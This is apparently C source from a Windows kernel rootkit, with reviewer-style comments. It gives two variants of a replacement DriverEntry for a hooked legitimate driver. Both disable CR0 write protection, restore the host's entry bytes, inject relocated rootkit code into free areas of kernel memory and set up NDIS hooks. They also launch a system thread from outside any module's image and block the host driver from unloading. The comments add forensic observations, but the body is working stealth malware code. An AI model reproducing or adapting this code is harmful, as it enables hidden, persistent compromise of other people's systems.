//--------------------------------------------------------------------------------------
// Replacement DriverEntry that sits on the patched entry point of a hooked driver.
//
// What this function visibly does, in order:
//   1. writes the EP_PATCH_SIZE saved bytes (m_EpOriginalBytes) back over
//      m_HookedEntry and calls the original entry point with the caller's
//      DriverObject/RegistryPath;
//   2. unregisters the LoadImageNotify image-load callback;
//   3. if the original entry point succeeded: relocates a pool copy of this
//      driver's image (m_DriverBase, m_DriverSize) for the address
//      m_FreeAreaFound - m_RkOffset, writes m_RkSize bytes of it to
//      m_FreeAreaFound, starts a system thread at the recalculated
//      DriverEntryContinueThread address, frees the pool copy and clears the
//      hooked driver's DriverUnload.
//
// Returns the hooked driver's status; when the thread-creation path is reached,
// the PsCreateSystemThread() status replaces it.
//
// Globals read: m_HookedEntry, m_EpOriginalBytes, m_DriverBase, m_DriverSize,
// m_FreeAreaFound, m_RkOffset, m_RkSize.  Written: m_bDriverMustBeFreed.
//
// Reviewer note: the observable result is a loaded driver whose DriverUnload is
// NULL and a system thread whose start address lies outside this driver's own
// image range — both are artefacts a memory-forensics check can compare against
// the on-disk image and the loaded-module list.
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    // disable memory write protection
    // NOTE(review): this variant calls ClearWp()/SetWp() directly, presumably on
    // the current processor only; the second NewDriverEntry in this file wraps the
    // same calls in ForEachProcessor() — confirm which behaviour is intended.
    ClearWp();

    // restore original code from image entry point
    memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);

    // enable memory write protection
    SetWp();

    // Run the original entry point now that its first bytes are intact.
    NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);

    DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);

    // The flag is only set when the callback was actually removed; it is later
    // used to decide whether m_DriverBase is handed to the new thread as context.
    if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)
    {
        m_bDriverMustBeFreed = TRUE;
    }

    if (NT_SUCCESS(ns))
    {
        // NOTE(review): untagged ExAllocatePool(); pool tracking reports such
        // allocations without a tag. ExAllocatePoolWithTag() is the usual form.
        PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);
        if (Image)
        {
            // prepare rootkit code for injection into the discardable sections
            memcpy(Image, m_DriverBase, m_DriverSize);

            // Relocate the scratch copy as if it were loaded at the address the
            // m_RkOffset-th byte will end up at (m_FreeAreaFound).
            RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));

            // disable memory write protection
            ClearWp();

            // NOTE(review): no check here that m_RkSize fits the area at
            // m_FreeAreaFound — presumably guaranteed where that area is chosen.
            memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);

            // enable memory write protection
            SetWp();

            // Base from which addresses inside the copied code are recomputed.
            PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;

            // set up NDIS hooks
            DriverEntryInitializePayload(PointerFixup);

            // Thread start address translated into the copied region
            // (RECALCULATE_POINTER is a project macro; its definition is not visible here).
            PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);

            DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start);

            // create thread for execution copied code
            HANDLE hThread = NULL;
            ns = PsCreateSystemThread(
                &hThread,
                THREAD_ALL_ACCESS,
                NULL, NULL, NULL,
                Start,
                // context: the original image base only when the notify
                // routine was removed above, otherwise no context
                m_bDriverMustBeFreed ? m_DriverBase : NULL
            );
            if (NT_SUCCESS(ns))
            {
                // The handle is not needed once the thread is running.
                ZwClose(hThread);
            }
            else
            {
                DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns);
            }

            // Only the m_RkSize bytes placed at m_FreeAreaFound survive;
            // the scratch copy is released.
            ExFreePool(Image);
        }

        // don't allow to unload target driver
        DriverObject->DriverUnload = NULL;
    }

    return ns;
}
//--------------------------------------------------------------------------------------
// Replacement DriverEntry for the patched entry point of a hooked driver
// (variant that copies this driver's whole image, section by section, into
// m_FreeAreaVA instead of a single byte range).
//
// What this function visibly does, in order:
//   1. writes the EP_PATCH_SIZE saved bytes (m_EpOriginalBytes) back over
//      m_HookedEntry and calls the original entry point;
//   2. if that succeeded: zero-fills m_FreeAreaVA (m_FreeAreaLength bytes),
//      copies this driver's PE headers and each section that is currently
//      valid in memory to the same RVA inside m_FreeAreaVA, applies
//      relocations via LdrProcessRelocs(), starts a system thread at the
//      DriverEntryContinueThread address translated into m_FreeAreaVA, and
//      clears the hooked driver's DriverUnload.
//
// Returns the hooked driver's status; when the thread-creation path is reached,
// the PsCreateSystemThread() status replaces it.
//
// Globals read: m_HookedEntry, m_EpOriginalBytes, m_Self (uses ->DllBase),
// m_FreeAreaVA, m_FreeAreaLength.  No globals are written in this variant.
//
// Reviewer note: the observable result is a loaded driver whose DriverUnload is
// NULL and a system thread whose start address lies outside any loaded module's
// image range — artefacts a memory-forensics check can compare against the
// loaded-module list.
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    // disable memory write protection
    ForEachProcessor(ClearWp, NULL);

    // restore original code from image entry point
    memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);

    // enable memory write protection
    ForEachProcessor(SetWp, NULL);

    // Run the original entry point now that its first bytes are intact.
    NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);

    DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);

    if (NT_SUCCESS(ns))
    {
        // NOTE(review): the headers are parsed as 32-bit NT headers. ImageBase
        // sits at a different offset/width in a PE32+ optional header, so the
        // ImageBase read for LdrProcessRelocs() below is only correct for an
        // x86 image — confirm this build is x86-only.
        PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)
            ((PUCHAR)m_Self->DllBase + ((PIMAGE_DOS_HEADER)m_Self->DllBase)->e_lfanew);

        // First section header follows the optional header.
        PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)
            (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader);

        // disable memory write protection
        ForEachProcessor(ClearWp, NULL);

        // copy driver headers to the founded area
        // NOTE(review): neither SizeOfHeaders nor the per-section
        // VirtualAddress + copy length is checked against m_FreeAreaLength
        // here — presumably guaranteed where m_FreeAreaVA is chosen.
        RtlFillMemory(m_FreeAreaVA, m_FreeAreaLength, 0);
        RtlCopyMemory(m_FreeAreaVA, m_Self->DllBase, pHeaders->OptionalHeader.SizeOfHeaders);

        // copy sections
        for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
        {
            PVOID DataPtr = (PUCHAR)m_Self->DllBase + pSection->VirtualAddress;

            // Sections whose first page is no longer resident (e.g. already
            // discarded) are skipped, leaving zeros from the fill above.
            // NOTE(review): MmIsAddressValid() tests a single address; a
            // section spanning several pages is not fully validated by it.
            if (MmIsAddressValid(DataPtr))
            {
                RtlCopyMemory(
                    (PUCHAR)m_FreeAreaVA + pSection->VirtualAddress,
                    DataPtr,
                    min(pSection->SizeOfRawData, pSection->Misc.VirtualSize)
                );
            }

            pSection += 1;
        }

        // reallocate copied image to the new address
        // The second argument is ImageBase - DllBase + m_FreeAreaVA; what
        // LdrProcessRelocs() expects there (new base vs. delta) is not visible
        // in this file — TODO confirm against its definition.
        LdrProcessRelocs(
            m_FreeAreaVA,
            (PVOID)((PUCHAR)pHeaders->OptionalHeader.ImageBase - (PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA)
        );

        // enable memory write protection
        ForEachProcessor(SetWp, NULL);

        // Thread start address = same RVA as DriverEntryContinueThread, inside the copy.
        PKSTART_ROUTINE Start = (PKSTART_ROUTINE)((PUCHAR)DriverEntryContinueThread - (PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA);

        // create thread for execution copied driver code
        HANDLE hThread = NULL;
        ns = PsCreateSystemThread(
            &hThread,
            THREAD_ALL_ACCESS,
            NULL, NULL, NULL,
            Start,
            NULL   // no start context in this variant
        );
        if (NT_SUCCESS(ns))
        {
            // The handle is not needed once the thread is running.
            ZwClose(hThread);
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "PsCreateSystemThread() fails; status: 0x%.8x\n", ns);
        }

        // don't allow to unload target driver
        DriverObject->DriverUnload = NULL;
    }

    return ns;
}